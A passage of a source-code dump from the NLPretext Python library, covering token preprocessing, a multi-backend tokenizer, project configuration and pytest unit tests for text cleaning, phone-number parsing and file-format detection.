# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List, Optional
import re
from nlpretext._utils.stopwords import get_stopwords
def remove_stopwords(
tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None
) -> List[str]:
"""
Remove stopwords from a text.
eg. 'I like when you move your body !' -> 'I move body !'.
Parameters
----------
tokens: list(str)
list of tokens
lang: str
language iso code (e.g : "en")
custom_stopwords : list(str)|None
list of custom stopwords to add. None by default
Returns
-------
list
tokens without stopwords
Raises
------
ValueError
When inputs is not a list
"""
stopwords = get_stopwords(lang)
if custom_stopwords:
stopwords += custom_stopwords
tokens = [word for word in tokens if word not in stopwords]
return tokens
def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:
"""
Inputs a list of tokens, outputs a list of tokens without tokens that
includes numbers of special caracters.
['foo','bar','124','34euros'] -> ['foo','bar'].
Parameters
----------
tokens : list
list of tokens to be cleaned
Returns
-------
list
list of tokens without tokens with numbers
"""
tokens = [word for word in tokens if re.search("[^a-zA-Z]", word) is None]
return tokens
def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:
"""
Remove tokens that doesn't contains any number or letter.
eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"].
Parameters
----------
tokens : list
list of tokens to be cleaned
Returns
-------
list
list of tokens without tokens that contains only special caracters
"""
tokens = [word for word in tokens if re.search("[a-zA-Z0-9]", word)]
return tokens
def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:
"""
Function that removes words which length is below a threshold
["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"].
Parameters
----------
text : list
list of strings
smallwords_threshold: int
threshold of small word
Returns
-------
list
"""
tokens = [word for word in tokens if len(word) > smallwords_threshold]
return tokens
================================================
FILE: nlpretext/token/tokenizer.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="assignment"
from typing import Any, List, Optional, Union
import os
import re
import nltk
import spacy
from sacremoses import MosesDetokenizer, MosesTokenizer
MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$")
SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"}
class LanguageNotHandled(Exception):
pass
class LanguageNotInstalledError(Exception):
pass
class SpacyModel:
class SingletonSpacyModel:
def __init__(self, lang: str) -> None:
self.lang = lang
if lang == "en":
self.model = _load_spacy_model("en_core_web_sm")
elif lang == "fr":
self.model = _load_spacy_model("fr_core_news_sm")
elif lang == "ko":
self.model = spacy.blank("ko")
elif lang == "ja":
self.model = spacy.blank("ja")
else:
raise (LanguageNotHandled("This spacy model is not available"))
model: Optional[spacy.language.Language] = None
def __init__(self, lang):
if not SpacyModel.model:
SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model
def get_lang_model(self) -> Optional[str]: # noqa: D102
if self.model:
lang: str = self.model.lang
return lang
return None
def _load_spacy_model(model: str) -> Any:
try:
return spacy.load(model)
except OSError as e:
if MODEL_REGEX.match(model):
os.system(f"python -m spacy download {model}") # nosec
return spacy.load(model)
else:
raise LanguageNotInstalledError(
f"Model {model} is not installed. "
f"To install, run: python -m spacy download {model}"
) from e
def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:
"""
Function that gets the right tokenizer given the language.
Parameters
----------
lang : str
Language in which text is written. Languages handled : ["en", "fr", "ko", "ja"]
Returns
-------
spacy.tokenizer.Tokenizer
spacy tokenizer
"""
model = SpacyModel(lang).model
if model:
return model.tokenizer
return None
def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]:
"""
Convert text to a list of tokens.
Parameters
----------
lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}
choose the tokenization module according to the langage and the implementation.
Recommanded: Spacy (faster, better results). To process other langages
import models.Spacy_models
Returns
-------
list
list of string
Raises
------
ValueError
If lang_module is not a valid module name
"""
if lang_module not in SUPPORTED_LANG_MODULES:
raise ValueError(
f"Invalid lang_module: {lang_module}. "
f"lang_module must be one of {SUPPORTED_LANG_MODULES}."
)
tokenized_words: List[str] = []
if "spacy" in lang_module:
lang = lang_module.split("_")[0]
spacymodel = _get_spacy_tokenizer(lang)
if spacymodel:
spacydoc = spacymodel(text)
tokenized_words = [spacy_token.text for spacy_token in spacydoc]
if lang_module == "en_nltk":
tokenized_words = nltk.word_tokenize(text)
if lang_module == "fr_moses":
tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False)
return tokenized_words
def untokenize(tokens: List[str], lang: str = "fr") -> str:
"""
Inputs a list of tokens output string.
["J'", 'ai'] >>> "J' ai".
Parameters
----------
lang : string
language code
Returns
-------
string
text
"""
d = MosesDetokenizer(lang=lang)
text: str = d.detokenize(tokens, unescape=False)
return text
def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str: # noqa: D103
if isinstance(tokens_or_str, str):
return tokens_or_str
if isinstance(tokens_or_str, list):
return untokenize(tokens_or_str)
if tokens_or_str is None:
return ""
raise TypeError("Please input string or tokens")
def convert_string_to_tokens( # noqa: D103
tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy"
) -> List[str]:
if isinstance(tokens_or_str, str):
return tokenize(tokens_or_str, lang_module=lang_module)
if isinstance(tokens_or_str, list):
return tokens_or_str
if tokens_or_str is None:
return []
raise TypeError("Please input string or tokens")
================================================
FILE: pyproject.toml
================================================
# Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/
[build-system]
requires = ["poetry_core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
[tool.poetry]
name = "nlpretext"
version = "1.2.2"
description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext"
readme = "README.md"
authors = [
"artefactory "
]
license = "Apache Software License 2.0"
repository = "https://github.com/artefactory/NLPretext"
homepage = "https://github.com/artefactory/NLPretext"
# Keywords description https://python-poetry.org/docs/pyproject/#keywords
keywords = [] # Update me
# Pypi classifiers: https://pypi.org/classifiers/
classifiers = [ # Update me
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
]
[tool.poetry.scripts]
# Entry points for the package https://python-poetry.org/docs/pyproject/#scripts
"nlpretext" = "nlpretext.cli.__main__:app"
[tool.poetry.dependencies]
python = ">=3.8,<3.11"
typer = {extras = ["all"], version = ">=0.3.2"}
rich = ">=10.1"
chardet = ">=3.0.4"
emoji = ">=2.0.0"
flashtext = ">=2.7"
ftfy = ">=4.2.0"
mosestokenizer = ">=1.1.0"
nlpaug = ">=1.0.1"
nltk = ">=3.4.2"
numpy = "^1.22"
phonenumbers = ">=8.10.12"
regex = ">=2019.8.19"
sacremoses = ">=0.0.13"
scikit-learn = ">=0.23.2, <2"
spacy = ">=3.0.5"
pillow = ">=8.2.1"
thinc = ">=8.0.4"
stop-words = ">=2018.7.23"
pandas = ">=1.3,<3.0"
pyarrow = ">=4.0.0"
fastparquet = ">=0.4.1"
dask = {version = ">=2021.5.0", extras = ["complete"], optional = true}
distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true}
tornado = ">=6.0.3"
torch = {version = "^1.9.0", optional = true}
[tool.poetry.group.dev.dependencies]
isort = ">=5.8.0"
pyupgrade = ">=2.12.0"
black = ">=20.8b1"
ruff = "^0.1.5"
mypy = ">=0.812"
bandit = ">=1.7.0"
safety = ">=1.10.3"
pytest = ">=6.2.1"
pytest-cov = ">=2.10.1"
coverage = ">=5.3"
pre-commit = ">=2.12.0"
mypy-extensions = ">=0.4.3"
types-emoji = ">=1.2.2"
types-chardet = ">=0.1.3"
types-click = ">=7.1.2"
[tool.poetry.group.docs.dependencies]
nbsphinx = ">=0.8.0"
notebook = ">=6.1.5"
Pygments = ">=2.8.0"
recommonmark=">=0.7.1"
Sphinx = ">=3.5.4"
sphinx-gallery = ">=0.8.1"
sphinxcontrib-applehelp = ">=1.0.2"
sphinxcontrib-devhelp = ">=1.0.2"
sphinxcontrib-htmlhelp = ">=1.0.3"
sphinxcontrib-jsmath = ">=1.0.1"
sphinxcontrib-qthelp = ">=1.0.3"
sphinxcontrib-serializinghtml = ">=1.1.4"
sphinx-autodoc-typehints = ">=1.11.1"
sphinx_rtd_theme = ">=0.5.2"
sphinx-multiversion-pre-post-build = ">=0.2.4"
[tool.poetry.extras]
torch = ["torch"]
dask = ["dask", "distributed"]
[tool.black]
# https://github.com/psf/black
line-length = 100
target-version = ["py38"]
[tool.isort]
# https://github.com/timothycrosley/isort/
profile = "black"
known_typing = "typing,types,typing_extensions,mypy,mypy_extensions"
sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER"
default_section = "FIRSTPARTY"
force_grid_wrap = 0
line_length = 100
[tool.ruff]
ignore = [
"D100",
"D101",
"D106",
"D205",
"D400",
"D415",
"D401",
]
line-length = 100
select = ["B", "C", "D", "E", "F", "W"]
[tool.ruff.pydocstyle]
convention = "numpy"
[tool.ruff.per-file-ignores]
"*cli.py" = ["D", "B008"]
"*__init__.py" = [
"F401",
"D100",
"D101",
"D103",
"D104",
"D105",
"D106",
"D107",
]
"tests/*" = ["D", "E501"]
================================================
FILE: references/.gitkeep
================================================
================================================
FILE: tests/__init__.py
================================================
================================================
FILE: tests/test_data_augmentation.py
================================================
import pytest
from nlpretext.augmentation.text_augmentation import (
CouldNotAugment,
UnavailableAugmenter,
get_augmenter,
process_entities_and_text,
)
@pytest.mark.parametrize(
"text, text_augmented, entities, expected",
[
(
"I want to buy a small black handbag.",
"I want to acquire a small black handbag",
[
{"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
{"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
{"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
],
{"type": str, "entities": ["black", "handbag", "small"]},
),
(
"I want to buy a small black handbag.",
"I would like to buy a black small handbag",
[
{"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
{"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
{"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
],
{"type": str, "entities": ["black", "handbag", "small"]},
),
],
)
def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):
augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)
augmented_entities = sorted(el["word"] for el in augmented_entities)
assert {"type": type(augmented_text), "entities": augmented_entities} == expected
@pytest.mark.parametrize(
"text, text_augmented, entities",
[
(
"I live in New York and I am looking for a lipstick",
"I live in New and York I an looking for a lipstick",
[
{"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18},
{"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50},
],
)
],
)
def test_process_entities_and_text_altered(text, text_augmented, entities):
with pytest.raises(CouldNotAugment) as excinfo:
process_entities_and_text(entities, text, text_augmented)
assert (
str(excinfo.value) == "Text was not correctly augmented because entities were altered"
)
def test_get_augmenter():
method = "ppdb_synonym"
with pytest.raises(UnavailableAugmenter) as excinfo:
get_augmenter(method)
assert (
str(excinfo.value)
== "The given augmenter is not supported. You must choose one \
of the following: wordnet_synonym or aug_sub_bert"
)
================================================
FILE: tests/test_file_loader.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import os
import re
import numpy as np
import pytest
from nlpretext._utils.file_loader import check_text_file_format, detect_encoding
TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!"
TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!"
def create_files():
encoded_s = TESTDOC_LATIN1.encode("latin-1")
with open("testdoc_latin1.txt", "wb") as f:
f.write(encoded_s)
encoded_s = TESTDOC_UTF8.encode("utf-8")
with open("testdoc_utf8.txt", "wb") as f:
f.write(encoded_s)
return True
def test_detect_encoding():
create_files()
expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""}
result = detect_encoding("testdoc_latin1.txt")
np.testing.assert_equal(result, expected)
remove_files()
def remove_files():
os.remove("testdoc_latin1.txt")
os.remove("testdoc_utf8.txt")
@pytest.mark.parametrize(
"input_filepath, raising, expected_str",
[
("hello.csv", False, "csv"),
("folder/hello.csv", False, "csv"),
("gs://folder/hello.csv", False, "csv"),
("s3://folder/hello.csv", False, "csv"),
("hdfs://folder/hello.csv", False, "csv"),
("az://folder/hello.csv", False, "csv"),
("wildcards/*.csv", False, "csv"),
("compressed/gz/text.csv.gz", False, "csv"),
("compressed/zip/text.csv.zip", False, "csv"),
(["hello.csv"], False, "csv"),
(["hello.csv", "compressed.csv.gz"], False, "csv"),
(["hello.csv", "other/folder/hello.csv"], False, "csv"),
("hello.json", False, "json"),
("folder/hello.json", False, "json"),
("gs://folder/hello.json", False, "json"),
(["hello.json", "folder/hello.json"], False, "json"),
("hello.txt", False, "txt"),
("folder/hello.txt", False, "txt"),
("gs://folder/hello.txt", False, "txt"),
(["hello.txt", "gs://folder/hello.txt"], False, "txt"),
("hello.parquet", False, "parquet"),
("folder/hello.parquet", False, "parquet"),
("gs://folder/hello.parquet", False, "parquet"),
(["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"),
(
"gs://folder/hello.notaformat",
True,
"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
),
(
"gs://folder/hello.gz",
True,
"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
),
(
"gs://folder/hello.zip",
True,
"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
),
(
"folder/*",
True,
"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
),
(
["hello.txt", "gs://folder/hello.csv"],
True,
re.escape("Multiple file formats found in file path list: ['txt', 'csv']"),
),
],
)
def test_check_text_file_format(input_filepath, raising, expected_str):
if raising:
with pytest.raises(ValueError, match=expected_str):
check_text_file_format(input_filepath)
else:
result = check_text_file_format(input_filepath)
assert result == expected_str
================================================
FILE: tests/test_phone_number.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import nlpretext._utils.phone_number as phone
from nlpretext._config.config import SUPPORTED_COUNTRY
def test_extract_phone_number():
input_str = "(541) 754-3010 is a US. Phone"
expected = ["(541) 754-3010", "754-3010"]
res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)
assert sorted(res) == sorted(expected)
def test_extract_phone_number_us():
input_str = "(541) 754-3010 is a US. Phone"
expected = ["(541) 754-3010"]
res = phone.extract_phone_numbers(input_str, countrylist=["US"])
assert res == expected
def test_extract_phone_number_fr():
input_str = "06.00.00.00.00 is a FR Phone"
expected = ["06.00.00.00.00"]
res = phone.extract_phone_numbers(input_str, countrylist=["FR"])
assert res == expected
def test_extract_phone_number_international():
input_str = "+33600000000 is an international Phone number"
expected = ["+33600000000"]
res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None])
assert res == expected
def test_phone_parser_us():
input_str = "(541) 754-3010"
expected = "+1 541-754-3010"
p = phone.PhoneParser()
p.parse_number(input_str, region_code="US")
res = p.format_number("INTERNATIONAL")
assert res == expected
def test_phone_parser_fr():
input_str = "0600000000"
expected = "+33600000000"
p = phone.PhoneParser()
p.parse_number(input_str, region_code="FR")
res = p.format_number("E164")
assert res == expected
================================================
FILE: tests/test_preprocessor.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import numpy as np
import pytest
from nlpretext._config.config import SUPPORTED_COUNTRY
from nlpretext._utils.stopwords import get_stopwords
from nlpretext.basic.preprocess import (
filter_non_latin_characters,
fix_bad_unicode,
normalize_whitespace,
remove_accents,
remove_eol_characters,
remove_multiple_spaces_and_strip_text,
remove_punct,
)
from nlpretext.basic.preprocess import remove_stopwords as remove_stopwords_text
from nlpretext.basic.preprocess import (
replace_currency_symbols,
replace_emails,
replace_numbers,
replace_phone_numbers,
replace_urls,
unpack_english_contractions,
)
from nlpretext.preprocessor import Preprocessor
from nlpretext.social.preprocess import (
convert_emoji_to_text,
extract_emojis,
extract_hashtags,
extract_mentions,
remove_emoji,
remove_hashtag,
remove_html_tags,
remove_mentions,
)
from nlpretext.token.preprocess import remove_smallwords, remove_special_caracters_from_tokenslist
from nlpretext.token.preprocess import remove_stopwords as remove_stopwords_token
from nlpretext.token.preprocess import remove_tokens_with_nonletters
@pytest.mark.parametrize(
"text, expected_result",
[
("ACV water + cinnamon + turmeric + cucumber + lemon. 👍🏻", [":thumbs_up_light_skin_tone:"]),
("This is a text without emojis", []),
],
)
def test_extract_emojis(text, expected_result):
result = extract_emojis(text)
assert expected_result == result
@pytest.mark.parametrize(
"text, expected_result",
[
("I take care of my skin with @hellobody", "I take care of my skin with"),
("This is a text without mentions", "This is a text without mentions"),
],
)
def test_remove_mentions(text, expected_result):
result = remove_mentions(text)
assert expected_result == result
@pytest.mark.parametrize(
"text, expected_result",
[
("I take care of my skin with @hellobody", ["@hellobody"]),
("This is a text without mentions", []),
],
)
def test_extract_mentions(text, expected_result):
result = extract_mentions(text)
assert expected_result == result
@pytest.mark.parametrize(
"text, expected_result",
[
(
"This is a text with content of html tag ",
"This is a text with content of html tag",
),
("This is a text without html tags", "This is a text without html tags"),
],
)
def test_remove_html_tags(text, expected_result):
result = remove_html_tags(text)
assert expected_result == result
@pytest.mark.parametrize(
"tokens_list, smallwords_threshold, expected_result",
[
(["I", "take", "care", "of", "my", "skin"], 2, ["take", "care", "skin"]),
(
["This", "text", "contains", "only", "long", "words"],
2,
["This", "text", "contains", "only", "long", "words"],
),
],
)
def test_remove_smallwords(tokens_list, smallwords_threshold, expected_result):
result = remove_smallwords(tokens_list, smallwords_threshold)
assert expected_result == result
@pytest.mark.parametrize(
"text, expected_result",
[
("this is a #hashtag in the middle of the text", ["#hashtag"]),
("#this is a hashtag in the beginning of the text", ["#this"]),
("this is a hashtag in the end of the #text", ["#text"]),
("this is a text with no hashtag", []),
("this is a text with #many #hashtags", ["#many", "#hashtags"]),
],
)
def test_extract_hashtags(text, expected_result):
result = extract_hashtags(text)
assert expected_result == result
@pytest.mark.parametrize(
"text, expected_result",
[
("this is a #hashtag in the middle of the text", "this is a in the middle of the text"),
(
"#this is a hashtag in the beginning of the text",
"is a hashtag in the beginning of the text",
),
("this is a hashtag in the end of the #text", "this is a hashtag in the end of the"),
("this is a text with no hashtag", "this is a text with no hashtag"),
("this is a text with #many #hashtags", "this is a text with"),
],
)
def test_remove_hashtag(text, expected_result):
result = remove_hashtag(text)
assert expected_result == result
@pytest.mark.parametrize(
"text, expected_filtered_text",
[
(
"كلمات Learn 3 Arabic كلمات words EASILY- Vocabulary #1 تعلم ٣ جديدة",
"Learn 3 Arabic words EASILY Vocabulary 1",
)
],
)
def test_filter_non_latin_characters(text, expected_filtered_text):
result = filter_non_latin_characters(text)
assert expected_filtered_text == result
@pytest.mark.parametrize(
"input_str, expected_str",
[
("hello world", "hello world"),
("\n hello world ", "hello world"),
("----- hello\tworld *****", "hello world"),
("hello-world", "hello-world"),
("hello - world", "hello world"),
],
)
def test_remove_multiple_spaces_and_strip_text(input_str, expected_str):
result = remove_multiple_spaces_and_strip_text(input_str)
np.testing.assert_string_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("\nhello world", " hello world"),
("hello\nworld", "hello world"),
("hello world\n", "hello world "),
],
)
def test_remove_eol_characters(input_str, expected_str):
result = remove_eol_characters(input_str)
np.testing.assert_string_equal(result, expected_str)
def test_remove_tokens_with_nonletters():
input_tokens = ["foo", "bar", "124", "34euros"]
expected_output = ["foo", "bar"]
result = remove_tokens_with_nonletters(input_tokens)
np.testing.assert_array_equal(result, expected_output)
def test_remove_special_caracters_from_tokenslist():
input_tokens = ["foo", "bar", "---", "'s", "#"]
expected_output = ["foo", "bar", "'s"]
result = remove_special_caracters_from_tokenslist(input_tokens)
np.testing.assert_array_equal(result, expected_output)
def test_get_stopwords():
languages_to_test = ["fr", "en", "ga", "zh"]
for lang in languages_to_test:
result = get_stopwords(lang)
assert len(result) > 0 and isinstance(result, list)
@pytest.mark.parametrize(
"input_tokens, lang, expected_output",
[(["I", "like", "this", "song", "very", "much", "!"], "en", ["I", "song", "!"])],
)
def test_remove_stopwords_tokens(input_tokens, lang, expected_output):
result = remove_stopwords_token(input_tokens, lang)
np.testing.assert_array_equal(result, expected_output)
@pytest.mark.parametrize(
"input_text, lang, custom_stopwords, ignored_stopwords, expected_output",
[
("I like this song very much !", "en", None, None, "I song !"),
("Can I get a beer?", "en", None, None, "Can I beer ?"),
("Je vous recommande ce film !", "fr", None, None, "Je recommande film !"),
("je vous recommande ce film !", "fr", None, None, "recommande film !"),
("Quiero una cerveza, por favor.", "es", None, None, "Quiero cerveza, favor."),
("je vous recommande ce film !", "fr", ["recommande"], None, "film !"),
("Quiero una cerveza, por favor.", "es", None, ["una"], "Quiero una cerveza, favor."),
("je vous recommande ce film !", "fr", ["recommande"], ["je vous"], "je vous film !"),
(
"je vous recommande ce film !",
"fr",
["recommande"],
["recommande ce film"],
"recommande ce film !",
),
],
)
def test_remove_stopwords_text(
input_text, lang, custom_stopwords, ignored_stopwords, expected_output
):
result = remove_stopwords_text(input_text, lang, custom_stopwords, ignored_stopwords)
np.testing.assert_array_equal(result, expected_output)
@pytest.mark.parametrize(
"input_text, lang, custom_stopwords, expected_output",
[
("I like this song very much !", "en", ["song"], "I !"),
(
"Je vous recommande ce film la scène de fin est géniale !",
"fr",
["film", "scène"],
"Je recommande fin géniale !",
),
],
)
def test_remove_custom_stopwords_text(input_text, lang, custom_stopwords, expected_output):
result = remove_stopwords_text(input_text, lang, custom_stopwords)
np.testing.assert_array_equal(result, expected_output)
def test_remove_accents():
input_str = "éèëêàù"
expected_str = "eeeeau"
result = remove_accents(input_str)
np.testing.assert_string_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("Les augmentations de rémunérations", "Les augmentations de rémunérations"),
(
"rénover l'enquête publique pour en faire un vrai outil d'aménagement du territoire et de dialogue social",
"rénover l'enquête publique pour en faire un vrai outil d'aménagement du territoire et de dialogue social",
),
(
"Limitations de vitesse et sécurité routière",
"Limitations de vitesse et sécurité routière",
),
("Pour un nouveau contrat citoyen", "Pour un nouveau contrat citoyen"),
(
"Développer les démarches de budget participatif dans les collectivités et associer les citoyens"
" dans la réalisation des projets",
"Développer les démarches de budget participatif dans les collectivités et associer les citoyens"
" dans la réalisation des projets",
),
("proportienelle", "proportienelle"),
("Pour plus de démocratie participative", "Pour plus de démocratie participative"),
("Transparence de la vie public", "Transparence de la vie public"),
("Egalité devant les infractions routières", "Egalité devant les infractions routières"),
],
)
def test_fix_bad_unicode(input_str, expected_str):
result = fix_bad_unicode(input_str)
np.testing.assert_string_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[(" foo ", "foo"), (" foo bar ", "foo bar")],
)
def test_normalize_whitespace(input_str, expected_str):
result = normalize_whitespace(input_str)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("I can't tell how we've done.", "I can not tell how we have done."),
("You're fired. She's nice.", "You are fired. She's nice."),
("Let's go!", "Let us go!"),
("You've been missing", "You have been missing"),
("I'm sure you're leaving", "I am sure you are leaving"),
("We'll survive.", "We will survive."),
],
)
def test_unpack_english_contractions(input_str, expected_str):
result = unpack_english_contractions(input_str)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
(
"Wan't to contribute to NLPretext? read https://github.com/artefactory/NLPretext/blob/master/CONTRIBUTING.md"
" first",
"Wan't to contribute to NLPretext? read *URL* first",
),
(
"If you go to http://internet.org, you will find a website hosted by FB.",
"If you go to *URL*, you will find a website hosted by FB.",
),
("Ishttps://internet.org/ available?", "Is*URL* available?"),
("mailto:john.doe@artefact.com", "*URL*"),
],
)
def test_replace_urls(input_str, expected_str):
result = replace_urls(input_str)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("my email:john.doe@artefact.com", "my email:*EMAIL*"),
("v543143@nwytg.net is a temporary email", "*EMAIL* is a temporary email"),
("our emails used to be name.surname@artefact.is", "our emails used to be *EMAIL*"),
],
)
def test_replace_emails(input_str, expected_str):
result = replace_emails(input_str)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("mon 06: 0601020304", "mon 06: *PHONE*"),
("mon 06: 06.01.02.03.04", "mon 06: *PHONE*"),
("call me at +33601020304", "call me at *PHONE*"),
("call me at +33 6 01 02 03 04", "call me at *PHONE*"),
("call me at +33 601 020 304", "call me at *PHONE*"),
(
"if this unit test doesn't work, call 3615 and says 'HELP'",
"if this unit test doesn't work, call *PHONE* and says 'HELP'",
),
("(541) 754-0000 is a US. Phone", "*PHONE* is a US. Phone"),
("+1-541-754-0000 is an international Phone", "*PHONE* is an international Phone"),
("+1-541-754-0000 Dialed in the US", "*PHONE* Dialed in the US"),
("+1-541-754-0000 Dialed from Germany", "*PHONE* Dialed from Germany"),
],
)
def test_replace_phone_numbers(input_str, expected_str):
result = replace_phone_numbers(
input_str,
replace_with="*PHONE*",
method="detection",
country_to_detect=SUPPORTED_COUNTRY,
)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("123, 3 petits chats", "*NUMBER*, *NUMBER* petits chats"),
("Give me 45bucks!", "Give me *NUMBER*bucks!"),
("call me at +33601020304", "call me at *NUMBER*"),
],
)
def test_replace_numbers(input_str, expected_str):
result = replace_numbers(input_str)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, param, expected_str",
[
("Give me 23$", None, "Give me 23USD"),
("Give me 23£", None, "Give me 23GBP"),
("Give me 23 £", None, "Give me 23 GBP"),
("Give me 23 €", None, "Give me 23 EUR"),
(
"¥ is both japanese yen and Chinese Renminbi",
"*CUR*",
"*CUR* is both japanese yen and Chinese Renminbi",
),
],
)
def test_replace_currency_symbols(input_str, param, expected_str):
result = replace_currency_symbols(input_str, replace_with=param)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, param, expected_str",
[
("Seriously...", None, "Seriously "),
("Seriously?", None, "Seriously "),
("Seriously ?", None, "Seriously "),
("Seriously???", None, "Seriously "),
("Seriously?!", None, "Seriously "),
('"Seriously"', None, " Seriously "),
("Seriously:", None, "Seriously "),
("Seriously;", None, "Seriously "),
("'Seriously'", None, " Seriously "),
("'Seriously'", ".,;", "'Seriously'"),
("Seriously.,.", ".,;", "Seriously "),
("Seriously...", ".,;", "Seriously "),
("Seriously.!.", ".,;", "Seriously ! "),
("john.doe@artefact.com", ".,;", "john doe@artefact com"),
("john.doe@artefact.com", None, "john doe artefact com"),
("john-doe@artefact.com", None, "john doe artefact com"),
],
)
def test_remove_punct(input_str, param, expected_str):
result = remove_punct(input_str, marks=param)
np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
"input_str, expected_str",
[
("⚽👌", ""),
("🎅🏿⌚", ""),
("🥖🍷🇫🇷", ""),
("✊", ""),
("Save 🐼 and 🐟", "Save and "),
],
)
def test_remove_emoji(input_str, expected_str):
result = remove_emoji(input_str)
assert len(result) == len(expected_str)
assert result == expected_str
@pytest.mark.parametrize(
"input_str, expected_str",
[
("⚽️👌", ":soccer_ball::OK_hand:"),
("🎅🏿⌚", ":Santa_Claus_dark_skin_tone::watch:"),
